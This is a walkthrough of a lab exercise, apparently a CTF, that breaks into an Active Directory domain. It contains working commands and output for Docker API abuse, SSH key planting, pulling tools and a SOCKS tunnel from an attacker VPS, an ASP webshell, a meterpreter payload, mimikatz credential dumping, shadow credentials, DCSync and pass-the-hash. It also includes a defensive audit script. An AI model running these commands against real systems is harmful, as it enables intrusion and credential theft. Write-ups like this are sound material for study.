Unauthorized is a medium-difficulty lab environment. Completing it teaches the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal penetration, deepens understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The lab has 3 flags, spread across different hosts.
At the start we are given a single target IP:
4x.xx.xx.xx
Scan it straight away with fscan:
fscan -h 4x.xx.xxx.xxx
fscan reports an unauthenticated Docker API with RCE (poc-yaml-docker-api-unauthorized-rce). Confirm it by opening the daemon's version endpoint:
http://4x.xx.xxx.xxx:2375/version
The daemon answers with its version JSON without asking for any credentials, which means the Docker Remote API is exposed and the unauthorized RCE is exploitable.
Next, from any machine that has the docker client installed, point the client at the remote daemon:
sudo docker -H tcp://4x.xx.xxx.xxx:2375 ps
Then start a container in privileged mode. Privileged mode exposes the host's block devices inside the container, which is what lets us mount the target's disk:
sudo docker -H tcp://4x.xx.xxx.xxx:2375/ run -it --privileged alpine /bin/sh
Inside the container, list the host's disks:
fdisk -l
Create a directory and mount the root partition on it (/dev/vda1 here; take the device name from the fdisk output):
mkdir test
mount /dev/vda1 test
cd test
From here we can read and write the host's filesystem directly.
fscan also showed the host's SSH port open, so instead of a reverse shell we simply drop a public key into root's authorized_keys through the mounted filesystem and log in over SSH.
Generate a key pair locally:
ssh-keygen -t rsa
Take the public key line (id_rsa.pub) and append it to root's authorized_keys on the mounted disk. Create the .ssh directory and set the permissions first in case it does not exist yet, since sshd (with the default StrictModes) rejects a key file that is writable by others:
mkdir -p /test/root/.ssh && chmod 700 /test/root/.ssh
echo ssh-rsa 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 kali@DESK >>/test/root/.ssh/authorized_keys
chmod 600 /test/root/.ssh/authorized_keys
That is all it takes: logging in as root with the matching private key now succeeds directly.
Then look for the flag. It is not in a file on this host but in the database; this is evidently the second flag.
Having got this far, what remains is lateral movement inside the internal network.
Upload fscan: serve it from a VPS on the public internet and fetch it from the target with wget.
python3 -m http.server 8080
wget 1xx.xx.xx.xx:8080/fscan
Download frpc and its config the same way to build a tunnel back to the VPS:
wget 1xx.xx.xx.xx:8080/frpc
wget 1xx.xx.xx.xx:8080/frpc.ini
frpc.ini (frps on the VPS listens on 7001 and publishes the SOCKS5 proxy on 8886):
[common]
server_addr = 1xx.xx.xx.xx
server_port = 7001
[socks_proxy]
type = tcp
remote_port =8886
plugin = socks5
Note that as written this publishes an unauthenticated SOCKS5 proxy into the lab network on the VPS's port 8886 for anyone who finds it; for anything beyond a throwaway lab, set a token under [common] and plugin_user / plugin_passwd in the socks5 section.
Then make the binaries executable and run them:
root@localhost:/tmp# chmod +x *
root@localhost:/tmp# ./fscan -h 172.22.7.13/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 172.22.7.13    is alive
(icmp) Target 172.22.7.6     is alive
(icmp) Target 172.22.7.31    is alive
(icmp) Target 172.22.7.67    is alive
[*] Icmp alive hosts len is: 4
172.22.7.67:445 open
172.22.7.13:2375 open
172.22.7.6:88 open
172.22.7.31:445 open
172.22.7.6:445 open
172.22.7.67:8081 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.67:135 open
172.22.7.31:135 open
172.22.7.6:135 open
172.22.7.13:80 open
172.22.7.67:80 open
172.22.7.67:21 open
172.22.7.13:22 open
[*] alive ports len is: 16
start vulscan
[*] 172.22.7.67         XIAORANG\WIN-9BMCSG0S
[*] 172.22.7.31         XIAORANG\ADCS
[*] 172.22.7.6    [+]DC XIAORANG\DC02
[+] NetInfo:
[*]172.22.7.67
   [->]WIN-9BMCSG0S
   [->]172.22.7.67
[+] NetInfo:
[*]172.22.7.31
   [->]ADCS
   [->]172.22.7.31
[+] NetInfo:
[*]172.22.7.6
   [->]DC02
   [->]172.22.7.6
[*] WebTitle:http://172.22.7.13        code:200 len:27170  title:某某装饰
[*] WebTitle:http://172.22.7.13:2375   code:404 len:29     title:None
[+] ftp://172.22.7.67:21:anonymous
   [->]1-1P3201024310-L.zip
   [->]1-1P320102603C1.zip
   [->]1-1P320102609447.zip
   [->]1-1P320102615Q3.zip
   [->]1-1P320102621J7.zip
   [->]1-1P320102J30-L.zip
[*] WebTitle:http://172.22.7.67        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
16/16 done
[*] scan finished, elapsed: 21.061062708s
root@localhost:/tmp# ./frpc -c ./frpc.ini &
[1] 3616
root@localhost:/tmp# 2022/10/17 17:48:09 [I] [service.go:301] [f866e9720aae6cbe] login to server success, get run id [f866e9720aae6cbe], server udp port [0]
2022/10/17 17:48:09 [I] [proxy_manager.go:144] [f866e9720aae6cbe] proxy added: [socks_proxy]
2022/10/17 17:48:09 [I] [control.go:180] [f866e9720aae6cbe] [socks_proxy] start proxy success
The scan gives us three Windows hosts (DC02 is the domain controller, ADCS is a certificate services host, WIN-9BMCSG0S runs IIS and an anonymous FTP) plus the Docker host we already own. Now analyse the internal assets: locally, configure Proxifier with the SOCKS5 proxy (the VPS IP, port 8886) and its rules, then browse the internal web pages.
The admin backend on 172.22.7.67:8081 also leaks its source as www.zip (fscan flagged it as poc-yaml-backup-file).
Download and inspect it.
The source tree contains the same files we saw on the anonymous FTP, which tells us the FTP root is mapped onto the site's download directory.
So we can upload a webshell straight into download over FTP.
An ASP one-liner:
<%eval request("pass")%>
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
226 Transfer complete.
ftp> exit
221 Goodbye.
root@localhost:/tmp# echo '<%eval request("pass")%>' > a.asp
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put a.asp
local: a.asp remote: a.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
26 bytes sent in 0.00 secs (1.3050 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
10-17-22  05:55PM                   26 a.asp
226 Transfer complete.
ftp>
Upload complete. Connect to the shell with Godzilla or any other webshell client.
Next, generate a payload that listens for a forward (bind) connection. The target has no outbound connectivity, so a reverse payload would never reach us:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4445 -f exe -o 1.exe
Run it on the target through the webshell, then connect to the listening port 4445 with msf, going through the SOCKS proxy:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set proxies socks5:1xx.xx.xx.xx:8886
msf6 exploit(multi/handler) > set RHOST 172.22.7.67
RHOST => 172.22.7.67
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.22.7.67:4445
NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version
[*] Sending stage (200774 bytes) to 172.22.7.67
[*] Meterpreter session 3 opened (192.168.1.104:58373 -> 1xx.xx.xx.xx:8886) at 2022-10-17 18:01:44 +0800
meterpreter >
getsystem escalates straight to SYSTEM (the IIS application pool identity has SeImpersonatePrivilege, which is what the named-pipe impersonation technique relies on):
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Then load kiwi and dump credentials. Besides the machine account, a domain user zhangfeng has a logon session on this host, and the kerberos section even gives that user's cleartext password:
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain    NTLM                              SHA1                                      DPAPI
--------       ------    ----                              ----                                      -----
WIN-9BMCSG0S$  XIAORANG  a85436900fad5521ab67cf6bc5ecf13a  7798c121e94987889f967251afdeb029562ca579
zhangfeng      XIAORANG  97db334121c5d97762be2bf549a5eb34  e197e0a2d4cd8de4196e8758a70814ba11689767  46b7d9fb7ad9ff9b6ef089249690dd56

wdigest credentials
===================

Username       Domain    Password
--------       ------    --------
(null)         (null)    (null)
WIN-9BMCSG0S$  XIAORANG  (null)
zhangfeng      XIAORANG  (null)

kerberos credentials
====================

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
WIN-9BMCSG0S$  xiaorang.lab  2e 71 03 fd 8f d8 12 79 30 be 2f 69 71 bd 21 a9 a9 28 21 0b 38 94 f9 cb a5 0e a0 63 f3 b6 f3 0c ad a9 a6 5d c3 c1 98 f9 d4 df 0a af 1b ec c6 e0 98 59 5d f8 5d ad 34 7d dc a3 f6 b3 e1 34 7c 94 e7 54 a7 0c 94 fa ba 37 c5 6c 9c 84 d3 53 89 a3 29 31 34 7 6 6d 4f e8 a4 05 a2 f1 6c bf 6c 26 dc ba ac a7 56 2c e1 c7 47 98 c5 2a 5c 77 10 98 1c f8 2d b7 35 8e b2 0f 3a 82 22 13 22 fa c7 b9 e9 b4 0d fb 5d e1 c9 bd d5 37 e0 bb 85 5f 21 53 90 c1 58 cd 4e c2 13 c2 60 be 4c 59 1a 87 dc ea 0e 9a fb d8 8a 9f cd 50 7e a7 b7 01 cf e4 d8 86 0d 5a a9 7b 03 09 f0 f1 19 fa 87 2b c2 63 9b d2 58 64 b5 b0 96 54 d6 3d 57 a7 91 48 88 e5 51 2d c5 4 2 5f b7 db a0 3a 9f b7 99 10 59 e3 d6 91 fc 98 cf c4 d2 8b a0 c0 48 51 19 91 cb ec 33 76 3a d5
win-9bmcsg0s$  XIAORANG.LAB  (null)
zhangfeng      XIAORANG.LAB  FenzGTaVF6En
Drop into a shell to gather more information (the command output below is translated from the host's Chinese locale, which came through garbled in the original):
meterpreter > shell
Process 4256 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\background\download>net user /domain
net user /domain
The request will be processed at a domain controller for domain xiaorang.lab.

User accounts for \\DC02.xiaorang.lab

-------------------------------------------------------------------------------
Administrator            chenjian                 chenjun
chentao                  chenwei                  chenyong
Guest                    krbtgt                   lijun
liliang                  liting                   liuping
zhangfeng                zhangjian                zhangjie
zhangkai                 zhangli                  zhangpeng
zhangyong
The command completed successfully.

C:\inetpub\wwwroot\background\download>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.

C:\inetpub\wwwroot\background\download>net time /domain
net time /domain
Current time at \\DC02.xiaorang.lab is 2022/10/17 18:08:49

The command completed successfully.

C:\inetpub\wwwroot\background\download>net user zhangfeng /domain
net user zhangfeng /domain
The request will be processed at a domain controller for domain xiaorang.lab.

User name                    zhangfeng
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2022/7/9 16:31:53
Password expires             Never
Password changeable          2022/7/10 16:31:53
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2022/10/10 4:05:24

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Key Admins          *Domain Users
The command completed successfully.

C:\inetpub\wwwroot\background\download>
This tells us that zhangfeng is a member of the Key Admins group.
Members of Key Admins can write the msDS-KeyCredentialLink attribute on objects in the domain, including domain controller computer accounts, so this membership can be abused with shadow credentials.
Before that we need to run in the context of the domain account xiaorang\zhangfeng. mimikatz showed the user has a logon session on this host, so there is a token to steal; I use the incognito module to switch to it:
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
IIS APPPOOL\background
NT AUTHORITY\SYSTEM
XIAORANG\zhangfeng

Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR

meterpreter > impersonate_token "XIAORANG\zhangfeng"
[+] Delegation token available
[+] Successfully impersonated user XIAORANG\zhangfeng
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\background\download>whoami
whoami
xiaorang\zhangfeng
With the token switched we can go after the Key Admins membership. For more detail see the project page.
First download the source of https://github.com/eladshamir/Whisker and compile it.
Upload the binary to the target system and, from the impersonated shell, add a key credential to the DC02 machine account:
Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab
Whisker prints the device ID, a base64-encoded PFX certificate with its password, and a ready-made Rubeus command.
Then upload Rubeus.exe as well, built from https://github.com/GhostPack/Rubeus.
Add /ptt to the printed command; it imports the resulting ticket into the current logon session, and the command echoed above did not have it. /getcredentials makes Rubeus follow the PKINIT TGT with a U2U request and recover DC02$'s NTLM hash from the PAC:
Rubeus.exe asktgt /user:DC02$ /certificate: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 /password:"v1FkG1vTFGEO0abD" /domain:xiaorang.lab /dc:DC02.xiaorang.lab /getcredentials /show /ptt
This step depends on PKINIT being available, which requires the KDC to hold a certificate for it; the ADCS server in this domain (172.22.7.31) is what makes that possible.
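What Whisker actually wrote is a value in msDS-KeyCredentialLink, and that is also where a defender finds it afterwards. The script below is an added example for this writeup, not Whisker's or DSInternals' code: it builds a constructed value in the DN-Binary form LDAP returns (B:<hex length>:<hex>:<owner DN>), parses it back following the MS-ADTS KEYCREDENTIALLINK_BLOB layout (4-byte version, then entries of 2-byte length, 1-byte identifier, data), and flags what an auditor would care about, a key on a domain controller account or a key created recently. The owner DN, device ID and timestamps are made up; the parser is what you would point at real values pulled with an LDAP search for (msDS-KeyCredentialLink=*).

```python
#!/usr/bin/env python3
"""Build and audit msDS-KeyCredentialLink values (shadow credentials).

Added example for this writeup; not Whisker's or DSInternals' code.
Sample owner DN, device ID and timestamps are constructed.
"""
import struct
import uuid
from datetime import datetime, timedelta, timezone

BLOB_VERSION = 0x00000200
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 1, 2, 3, 4, 5
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 6, 7, 8, 9
ENTRY_NAMES = {
    KEY_ID: "KeyID", KEY_HASH: "KeyHash", KEY_MATERIAL: "KeyMaterial",
    KEY_USAGE: "KeyUsage", KEY_SOURCE: "KeySource", DEVICE_ID: "DeviceId",
    CUSTOM_KEY_INFO: "CustomKeyInformation",
    LAST_LOGON: "KeyApproximateLastLogonTimeStamp", CREATION_TIME: "KeyCreationTime",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """Windows FILETIME: 100-ns intervals since 1601-01-01 UTC."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def from_filetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def build_blob(entries) -> bytes:
    """entries: iterable of (identifier, raw bytes); each becomes <len:2><id:1><data>."""
    blob = struct.pack("<I", BLOB_VERSION)
    for ident, data in entries:
        blob += struct.pack("<HB", len(data), ident) + data
    return blob


def to_dn_binary(blob: bytes, owner_dn: str) -> str:
    return f"B:{2 * len(blob)}:{blob.hex().upper()}:{owner_dn}"


def parse_dn_binary(value: str):
    tag, hex_len, hex_data, owner_dn = value.split(":", 3)
    if tag != "B" or int(hex_len) != len(hex_data):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hex_data), owner_dn


def parse_blob(blob: bytes) -> dict:
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != BLOB_VERSION:
        raise ValueError(f"unexpected KeyCredentialLink version 0x{version:08x}")
    off, entries = 4, {}
    while off + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        data = blob[off:off + length]
        off += length
        name = ENTRY_NAMES.get(ident, f"Unknown{ident}")
        if ident == DEVICE_ID:
            entries[name] = str(uuid.UUID(bytes_le=data))  # Windows GUID byte order
        elif ident in (LAST_LOGON, CREATION_TIME):
            entries[name] = from_filetime(struct.unpack("<Q", data)[0])
        else:
            entries[name] = data.hex()
    return entries


def audit(value: str, now: datetime, recent: timedelta = timedelta(days=7)) -> list:
    """Findings for one account's value: any key on a DC account, or any key created recently."""
    blob, owner_dn = parse_dn_binary(value)
    e = parse_blob(blob)
    findings = []
    if "ou=domain controllers" in owner_dn.lower():
        findings.append(f"key credential on DC account {owner_dn} (device {e.get('DeviceId')})")
    created = e.get("KeyCreationTime")
    if created is not None and now - created <= recent:
        findings.append(f"key created {created.isoformat()} on {owner_dn}")
    return findings


def sample_value():
    """Constructed value shaped like what Whisker leaves on DC02$ (IDs and times made up)."""
    device = uuid.UUID("6f1b2c3d-4e5f-4a6b-8c7d-9e0f1a2b3c4d")
    created = datetime(2022, 10, 17, 10, 5, 0, tzinfo=timezone.utc)
    blob = build_blob([
        (KEY_ID, bytes(32)),        # SHA-256 of the public key; zeroed in this sample
        (KEY_USAGE, b"\x01"),       # NGC
        (KEY_SOURCE, b"\x00"),      # AD
        (DEVICE_ID, device.bytes_le),
        (CREATION_TIME, struct.pack("<Q", to_filetime(created))),
    ])
    return to_dn_binary(blob, "CN=DC02,OU=Domain Controllers,DC=xiaorang,DC=lab"), str(device), created


if __name__ == "__main__":
    value, _, created = sample_value()
    for finding in audit(value, created + timedelta(hours=8)):
        print(finding)
```

On the detection side, the write itself is visible as well: with "Audit Directory Service Changes" enabled on the domain controllers, the modification shows up as Event ID 5136 naming the msDS-KeyCredentialLink attribute and the account that wrote it, which here would be zhangfeng. Whisker also has a remove command that takes the device ID printed by add, so clean the value up when the engagement ends.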
With the DC02$ TGT in memory we can now DCSync the domain Administrator hash with mimikatz, because a domain controller's machine account holds the replication rights that DCSync needs:
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" exit
That yields the domain Administrator's NT hash.
From there, wmiexec from the impacket toolkit gets us onto the domain controller by pass-the-hash:
$ impacket-wmiexec xiaorang.lab/administrator:@172.22.7.6 -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
DC02

C:\>type C:\users\administrator\flag\*

C:\users\administrator\flag\flag03.txt

(ASCII-art banner)

flag04:flag{8xxxxe-4f3xxxx2-8xxxxx-8xxxxx5}
The other domain host, ADCS, can be reached the same way with the same hash:
$ impacket-wmiexec xiaorang.lab/administrator:@172.22.7.31 -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
ADCS
That completes the lab.